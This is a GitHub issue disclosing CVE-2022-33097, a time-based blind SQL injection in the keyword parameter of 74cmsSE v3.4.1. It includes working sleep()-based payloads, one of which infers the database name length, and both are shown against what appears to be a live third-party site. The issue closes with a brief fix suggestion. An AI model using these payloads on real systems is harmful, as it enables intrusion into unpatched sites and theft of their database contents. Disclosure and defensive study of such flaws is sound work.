CVE-2022-33097: SQL Injection vulnerability · Issue #7 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.4.1
Date of Discovery: 5/5/2022
Product version：74cmsSE_v3.4.1
Download link：http://www.74cms.com/downloadse/show/id/62.html
Vulnerability Description:
74cmsSE_v3.4.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.

POC:
Payload：
/v1_0/home/campus/campus_job?keyword=/%27%2B(select(sleep(2)))%2B%27%25/

In the path
/v1_0/home/campus/campus_job
is not strictly filtered for $keyword, resulting in SQL injection
exp1:
http://www.jllxg.com/v1_0/home/campus/campus_job?keyword=/*%27%2B(select(sleep(2)))%2B%27%25*/

As you can see from the figure above, the sleep() function is executed, and there is a time blind-SQL
With the payload test above, it is possible that the sleep() function being executed 4 times.
Time blinds are possible to guess the length of the database:
exp2:
http://www.jllxg.com/v1_0/home/campus/campus_job?keyword=/*%27%2B(select(sleep(length(database()))))%2B%27%*/

As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is "hsjp ", and the delay as exactly 4 times the length of database(), so the injection is successfull

It’s a time-based SQL injection
Suggest: Add a filter function to this parameter